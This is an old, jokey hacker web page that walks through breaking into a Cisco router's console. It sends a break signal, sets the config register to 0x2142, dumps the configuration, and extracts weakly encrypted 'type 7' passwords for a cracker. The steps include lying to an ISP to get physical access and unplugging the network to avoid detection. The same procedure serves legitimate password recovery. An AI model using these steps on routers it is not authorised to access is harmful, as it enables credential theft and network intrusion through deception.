All sorts of clever people have come up with these lovely utilities for converting Cisco passwords into plain text. Here is a handy little resource for those crucial moments when you just simply forgot to bring your Unix box to the party...
What am I saying??? What I really meant was, some criminally insane sociopaths have abused their positions of power/knowledge to subvert the very fabric of society by wantonly spreading their evil lies and dangerous propaganda, corrupting the innocent in droves along the way, causing mass hysteria, chaos, panic in the streets, flood, famine, pestilence, unwanted pregnancies etc. etc...
It falls to me, therefore, to expose their underground activities, for the world to see, because only be learning their devious tricks can we hope to ever get the better of them...
OK. So what are we actually talking about here? Well... A Cisco router is one of
those funny black boxes that sits in your server room, and connects you to that
Internet thingy. Cisco sell a *lot* of these boxes, and a large percentage of
the Internet is made up of them... They turn over getting on for 8 Billion dollars,
selling little black boxes, and, since the security of your network is in part
(and often completely) dependant on them, they have taken careful steps to ensure
that your router is safe from that world of uninvited guests queuing at your
netstep... One of the ways they've protected you is by the use of passwords.
It is possible to provide a password to stop any Harry, Dick or Tom from
logging into your router and tweaking it's configuration... Since this password
contains the keys to your netdom, they encrypt it for added security. Again,
since this key is so important, they spent several minutes, possibly even
hours, devising an encryption scheme that makes your password completely safe
from prying eyes (rather than spending any of those nice dollars on licencing some strong crpyto)... This encryption scheme is so secure that it was reputedly
cracked during a casual conversation over a cup of coffee in a fast-food restaurant, and the algorithm noted
down on a napkin. The algorithm is now widely known, and several versions of
the cracker have been published. In addition to the cracker itself, you will
also need to know how to get the encrypted password out of the Cisco in the
first place, and that is what we are going to look at now:
As every little schoolthang knows, every good adventure starts with a map/secret message/tunnel/high class hooker/etc., and this is no exception... We have a secret message AND a back door... First we must obtain the secret message - to do this, you'll need to have physical
access to the Cisco. The simplest way is to phone your ISP and tell him/her/geek
that you are moving some stuff around in the server room, and need to power it off for a bit.
Once it's powered off, follow these steps very carefully...
(Note: This procedure will only work on Motorola based cisco's, ie. 17xx, 2xxx, and SOME of the
43xx's (4300's are weird). The 7000's and above have some different ways of changing
the memory registers, namely "confreg"... if in doubt, read Asmodeous' text on the subject BEFORE trying this).
1. Disconnect the network connection (you wouldn't want your ISPBitch logging in to see what you were up to, now would you...?)Your log file should now contain a complete dump of the Cisco... simply find the encrypted entries (they will look something like ' enable password 7 14341B180F0B187875212766'), cut and paste them into the field below and hit the Cisco logo, or process them yourself using the programs provided. Enjoy.
2. Connect your notebook/pc/Cray/aleph to the 'Console' port. This is an RJ45 style connecter on the back of your Cisco providing Serial (RS232) data. Don't plug anything else into it! I have blown up perfectly good Ciscos by accidentally plugging ISDN/Network into these (still not sure which - and I can't afford to find out!).
3. Fire up HyperTerm or your favourite comms proggy (at 9600,n,8,1), switch logging on, and power up the Cisco.
You should see it booting up:
System Bootstrap, Version 5.2(5), RELEASE SOFTWARE
Copyright (c) 1986-1994 by cisco Systems
2500 processor with 1024 Kbytes of main memory
Send anESCorBREAKsignal (CTL-Break in Hyperterm), and you should see something like:
Abort at 0x10E7EBA (PC)
Followed by a '>' prompt...
4. typeO/R 0x2142
5. typei
The system should now boot again, only this time it won't load it's normal startup configuration... It will come up in 'configuration' mode, and start asking questions... Just say 'no' until you get to the 'Router>' prompt (Note: If you find that it still boots up as normal, you probably didn't hit 'Break' fast enough... You have to catch it good and early before it's copied the stored configuration into boot RAM).
6. typeenable
The 'Router>' prompt should now change to 'Router#', and you've rooted your router!
7. typesh conf
You'll now get some pages of configuration... just hit the space bar whenever you get a '--More--' prompt, until you get back to the 'Router#' prompt.
You've now got all the data you need, so we can put the router back how we found it:
8. typeconf term
9. typeconfig-register 0x2102
10. typeexit
11. disconnect from the Cisco, reconnect the network and power cycle it (switch it off and on, dummy!).
BobbyRite (b) 1997,8,9, Major Malfunction , All Writes Reversed, all Wrongs degneveR.